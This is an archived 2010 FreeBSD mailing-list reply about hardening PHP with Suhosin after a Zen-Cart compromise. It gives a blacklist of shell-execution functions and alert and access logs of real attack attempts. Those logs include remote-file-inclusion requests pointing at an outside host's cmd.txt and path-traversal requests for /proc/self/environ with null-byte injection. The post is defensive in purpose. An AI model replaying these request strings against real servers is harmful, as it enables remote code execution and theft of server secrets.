Date: Mon, 1 Feb 2010 19:19:46 +0200 From: Bogdan Webb <bogdan@pgn.ro> To: freebsd-questions@freebsd.org Subject: Re: Server compromised Zen-Cart "record company" Exploit Message-ID: <c81e6afd1002010919l636369e4sa30d87e00e87a9b9@mail.gmail.com> In-Reply-To: <alpine.BSF.2.00.1002011107080.28912@mail.pil.net> References: <alpine.BSF.2.00.1001301829060.97440@mail.pil.net> <alpine.BSF.2.00.1002011107080.28912@mail.pil.net>
next in thread | previous in thread | raw e-mail | index | archive | help
Indeed it's pretty tricky with safe_mode, like for certain i know that a version of a popular r57 shell had safe_mode bypass - i was stunned to check the shell myself on my server... and i was thinking that safe_mode is enough... (+ i was using the suhoshin patch *witch in fact does nothing regarding straightening the php) then i came over suhoshin the addon (witch on my BSD with lighttpd it could be loaded only using Zen framework... for unknown reasons to me) the suhoshin was configured to blacklist some basic commands that allow php to directly run shell commands: suhosin.executor.func.blacklist = "proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec" thus even if hackers find bugs in some php apps it would be harder to get a shell... i say harder because it's impossible to prevent that - there are mysql ways to get shell and so on ... so it's not 100% foolproof, but it's here's some examples on how suhoshin alerts the attacks: Jan 2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '91.121.75.82', file '/usr/home/wwww/pgnlinks/index.php') Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '86.122.161.162', file '/usr/home/wwww/pvpwww/junkforum/Sources/Subs.php', line 3531) *note - these are logs from /var/log/messages and the last message is a false-positive (i thinks it's called that way) it's a basic function of SMF board to check the DNS with a linux command, but i just wanted to point out how it handles the blacklist... here's a more detailed info regarding attacks (attempts) stored in the webserver's log file (in my case lighttpd): 2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php') 2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'c' (attacker '189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php') 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] "GET /index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1" 302 0 "-" "Mozilla/3.0 (compatible; Indy Library)" 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] "GET /index.php?c= http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1" 200 3304 "-" "Mozilla/3.0 (compatible; Indy Library)" 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] "GET /index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3307 "-" "Mozilla/3.0 (compatible; Indy Library)" 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] "GET /index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3306 "-" "Mozilla/3.0 (compatible; Indy Library)" My server has safe_mode off - bcoz it's not needed (at least in my mind... i might be mistaking) and check out the phpinfo.php file i've got and see the suhoshin settings.... stay safe!
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?c81e6afd1002010919l636369e4sa30d87e00e87a9b9>